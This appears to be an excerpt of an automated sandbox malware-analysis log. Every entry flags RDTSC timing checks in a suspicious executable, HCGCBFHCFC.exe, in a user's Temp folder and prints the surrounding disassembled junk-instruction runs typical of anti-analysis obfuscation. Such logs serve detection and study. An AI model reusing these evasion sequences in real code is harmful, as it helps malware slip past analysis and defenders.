                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D8C8E second address: 9D8C9F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D8C9F second address: 9D8CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F73D4C57606h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F73D4C57608h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d js 00007F73D4C5760Bh 0x00000033 xor di, E356h 0x00000038 push 00000000h 0x0000003a clc 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D8CE6 second address: 9D8D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E056h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DA20E second address: 9DA214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DACB4 second address: 9DACC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DACC3 second address: 9DACD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DACD3 second address: 9DACD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DACD9 second address: 9DACDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DB732 second address: 9DB756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F73D4D0E057h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edi 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DB756 second address: 9DB7BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F73D4C5761Eh 0x00000008 jmp 00007F73D4C57618h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D1CA9h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F73D4C57608h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edi, eax 0x00000034 push 00000000h 0x00000036 sub edi, 16BDA652h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jnl 00007F73D4C57606h 0x00000048 popad 0x00000049 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E0926 second address: 9E092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E18E4 second address: 9E18E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E18E8 second address: 9E18EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E18EC second address: 9E18FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F73D4C5760Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D6E3F second address: 9D6E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D8A70 second address: 9D8A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F73D4C57608h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E4976 second address: 9E497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D6E4F second address: 9D6E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007F73D4C57608h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E497A second address: 9E4980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9DB4D7 second address: 9DB4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F73D4C5760Ch 0x0000000b jno 00007F73D4C57606h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E6B2B second address: 9E6BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F73D4D0E054h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F73D4D0E048h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movzx ebx, bx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F73D4D0E048h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 pushad 0x00000046 cmc 0x00000047 push esi 0x00000048 pop esi 0x00000049 popad 0x0000004a push 00000000h 0x0000004c mov ebx, dword ptr [ebp+122D2F6Ch] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E6BA3 second address: 9E6BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E6BA8 second address: 9E6BB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73D4D0E04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7BD2 second address: 9E7BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7BE5 second address: 9E7C4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D2E3Ah], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F73D4D0E048h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jg 00007F73D4D0E048h 0x00000032 push 00000000h 0x00000034 mov bx, ax 0x00000037 mov dword ptr [ebp+122D1987h], eax 0x0000003d xchg eax, esi 0x0000003e jo 00007F73D4D0E05Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7C4E second address: 9E7C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7C66 second address: 9E7C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E8C05 second address: 9E8C7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F73D4C57613h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F73D4C57608h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov bl, E8h 0x0000002a push 00000000h 0x0000002c or dword ptr [ebp+122D236Ch], edi 0x00000032 push 00000000h 0x00000034 sbb di, 0321h 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jl 00007F73D4C5760Ch 0x00000041 jmp 00007F73D4C57617h 0x00000046 popad 0x00000047 push eax 0x00000048 jnl 00007F73D4C57610h 0x0000004e push eax 0x0000004f push edx 0x00000050 push ebx 0x00000051 pop ebx 0x00000052 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E9D62 second address: 9E9D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECBB7 second address: 9ECBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECBBB second address: 9ECC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F73D4D0E048h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 pushad 0x00000028 mov eax, dword ptr [ebp+122D2AC0h] 0x0000002e mov bx, 08D6h 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F73D4D0E048h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f pushad 0x00000050 jmp 00007F73D4D0E04Fh 0x00000055 mov dword ptr [ebp+122D32CBh], ecx 0x0000005b popad 0x0000005c push 00000000h 0x0000005e xchg eax, esi 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECC46 second address: 9ECC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E0B9D second address: 9E0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E0BA3 second address: 9E0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E1B6F second address: 9E1B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E2AB4 second address: 9E2ABE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F73D4C5760Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E0BA7 second address: 9E0C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+1247219Ah], ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 or bl, 0000004Bh 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F73D4D0E048h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov ebx, dword ptr [ebp+122D226Fh] 0x00000042 mov eax, dword ptr [ebp+122D0AADh] 0x00000048 push FFFFFFFFh 0x0000004a ja 00007F73D4D0E04Eh 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F73D4D0E054h 0x00000057 pushad 0x00000058 js 00007F73D4D0E046h 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E3AF8 second address: 9E3AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E3AFD second address: 9E3B10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F73D4D0E046h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E4ADD second address: 9E4AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E5C6D second address: 9E5C7A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E6DCB second address: 9E6DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Dh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7E0F second address: 9E7E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F73D4D0E04Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E8DF9 second address: 9E8E62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bh, 44h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 sub edi, dword ptr [ebp+122D1A2Eh] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F73D4C57608h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov eax, dword ptr [ebp+122D06F5h] 0x00000040 jmp 00007F73D4C5760Dh 0x00000045 push FFFFFFFFh 0x00000047 mov dword ptr [ebp+122D1950h], edx 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F73D4C5760Ah 0x00000055 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E4AE3 second address: 9E4AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7E29 second address: 9E7E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9EBE4F second address: 9EBE6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E4AE8 second address: 9E4AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9EDB34 second address: 9EDB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F73D4D0E04Ch 0x00000011 jnp 00007F73D4D0E046h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E7E2D second address: 9E7E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9EBE6A second address: 9EBE81 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F73D4D0E04Ch 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E4B9B second address: 9E4B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9E4B9F second address: 9E4BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9EFADD second address: 9EFAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECD5E second address: 9ECD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECD64 second address: 9ECD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F73D4C5761Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e jp 00007F73D4C5760Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECD92 second address: 9ECDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 stc 0x00000007 push dword ptr fs:[00000000h] 0x0000000e mov ebx, 27130A33h 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a xor dword ptr [ebp+122D1A13h], edx 0x00000020 mov eax, dword ptr [ebp+122D0C65h] 0x00000026 mov bx, dx 0x00000029 push FFFFFFFFh 0x0000002b jmp 00007F73D4D0E04Dh 0x00000030 push eax 0x00000031 js 00007F73D4D0E05Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F73D4D0E04Ah 0x0000003e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9ECDDD second address: 9ECDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F3D6C second address: 9F3D76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73D4D0E04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9EDC86 second address: 9EDC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F80B5 second address: 9F80B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F80B9 second address: 9F80DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F73D4C5760Bh 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F80DB second address: 9F80F3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F73D4D0E04Eh 0x00000008 jnp 00007F73D4D0E04Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F80F3 second address: 9F811E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F73D4C57606h 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007F73D4C57615h 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F7ACA second address: 9F7AEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F73D4D0E046h 0x00000008 jmp 00007F73D4D0E04Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F73D4D0E046h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9F7AEB second address: 9F7AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD53A second address: 9FD55E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73D4D0E04Fh 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD55E second address: 9FD568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F73D4C57606h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD568 second address: 9FD56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD56C second address: 9FD592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C57618h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9FD592 second address: 9FD59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F73D4D0E046h 0x0000000a rdtsc
